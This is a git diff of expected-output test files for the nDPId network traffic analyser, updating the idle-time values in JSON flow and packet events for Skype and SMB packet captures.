00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
@@ -1266,16 +1266,16 @@ 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970665893,"flow_last_seen":1431970665893,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.148","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970659835,"flow_last_seen":1431970659835,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.146","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970653869,"flow_last_seen":1431970653869,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.162","src_port":13021,"dst_port":40033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970685852,"flow_last_seen":1431970686318,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":51,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51284,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00608{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686319,"flow_last_seen":1431970686843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51285,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970690890,"flow_last_seen":1431970691584,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":17,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51296,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970690890,"flow_last_seen":1431970705762,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":335,"flow_tot_l4_payload_len":2522,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.24","src_port":51297,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00610{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431970691584,"flow_last_seen":1431970703178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51299,"dst_port":12350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970649777,"flow_last_seen":1431970649777,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.165","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00708{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681960,"flow_last_seen":1431970681960,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.144","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} diff --git a/test/results/smb_deletefile.pcap.out b/test/results/smb_deletefile.pcap.out index 723f030be..0ab22d547 100644 --- a/test/results/smb_deletefile.pcap.out +++ b/test/results/smb_deletefile.pcap.out 
@@ -1,11 +1,11 @@ 00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"smb_deletefile.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1584368315417} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01014{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":434,"pkt_l4_len":400,"thread_ts_msec":1584368315417,"pkt":"2MuK4S0uKDc3AG3ICABFAAGkAABAAEAGtNLAqAF2wKgBu94QAb3ooAVq8kMyI1AYqgDfmAAAAAABeP5TTUJAAAEAAAAAAAUAAAEAAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAA5AAAAAgAAAAAAAAAAAAAAAAAAAAAAAACBABAAEAAAAAcAAAABAAAAAQAAAHgAHAAAAAAAAAAAAEwAdQBjAGEAXABEAG8AdwBuAGwAbwBhAGQAcwAAAAAA\/lNNQkAAAQAAAAAADgAAAQQAAACIAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAACEAJQMAAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2AAJgAAAAEAaQBuAG4AbwBzAGUAdAB1AHAALQA1AC4ANgAuADEALgBlAHgAZQAAAP5TTUJAAAEAAAAAAAYAAAEEAAAAAAAAAJ4PAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7440000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 
-01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1584368315418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1584368315418,"pkt":"KDc3AG3I2MuK4S0uCABFAAIcOK5AAIAGO6zAqAG7wKgBdgG93hDyQzIj6KAG5lAYEAjw+QAAAAAB8P5TTUJAAAEAAAAAAAUAAAABAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAABZAAAAAQAAAPJad+s0itQBeC8Pcpz71QGM0O1xnPvVAYzQ7XGc+9UBACAAAAAAAAAAIAAAAAAAABEAAAAAAAAAEgQAAAoAAABlAAAACgAAAAAAAAAAAAAA\/lNNQkAAAQAAAAAADgAAAAUAAADYAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAkASACOAAAAAAAAAAAAAAAzwlM5LZjUATN2tkyb+9UBqrZQPC2Y1AHHrtHNIlnVAYD0HQAAAAAAAAAeAAAAAAAgAAAAJgAAAAAAAAAYAEkATgBOAE8AUwBFAH4AMQAuAEUAWABFAAAAq04CAAAAAQBpAG4AbgBvAHMAZQB0AHUAcAAtADUALgA2AC4AMQAuAGUAeABlAAAA\/lNNQkAAAQAAAAAABgADAAUAAAAAAAAAng8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1584368315418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1584368315418,"pkt":"2MuK4S0uKDc3AG3ICABFAAAoAABAAEAGtk7AqAF2wKgBu94QAb3ooAbm8kM0F1AQqfyLpgAA"} 
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":101,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1584368315417,"flow_last_seen":1584368317802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":25252,"flow_avg_l4_payload_len":250,"midstream":1,"thread_ts_msec":1584368317802,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7560000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+01014{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1584368315417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":434,"pkt_l4_len":400,"thread_ts_msec":1584368315417,"pkt":"2MuK4S0uKDc3AG3ICABFAAGkAABAAEAGtNLAqAF2wKgBu94QAb3ooAVq8kMyI1AYqgDfmAAAAAABeP5TTUJAAAEAAAAAAAUAAAEAAAAAmAAAAJwPAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAA5AAAAAgAAAAAAAAAAAAAAAAAAAAAAAACBABAAEAAAAAcAAAABAAAAAQAAAHgAHAAAAAAAAAAAAEwAdQBjAGEAXABEAG8AdwBuAGwAbwBhAGQAcwAAAAAA\/lNNQkAAAQAAAAAADgAAAQQAAACIAAAAnQ8AAAAAAAD\/\/gAAEQAAAB0AAAAAKAAAAAAAAAAAAAAAAAAAAAAAACEAJQMAAAAA\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/2AAJgAAAAEAaQBuAG4AbwBzAGUAdAB1AHAALQA1AC4ANgAuADEALgBlAHgAZQAAAP5TTUJAAAEAAAAAAAYAAAEEAAAAAAAAAJ4PAAAAAAAA\/\/4AABEAAAAdAAAAACgAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAP\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8="} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"smb_deletefile.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1584368315417,"flow_last_seen":1584368315417,"flow_idle_time":7560000,"flow_min_l4_payload_len":380,"flow_max_l4_payload_len":380,"flow_tot_l4_payload_len":380,"flow_avg_l4_payload_len":380,"midstream":1,"thread_ts_msec":1584368315417,"l3_proto":"ip4","src_ip":"192.168.1.118","dst_ip":"192.168.1.187","src_port":56848,"dst_port":445,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv23","breed":"Acceptable","category":"System"}} 
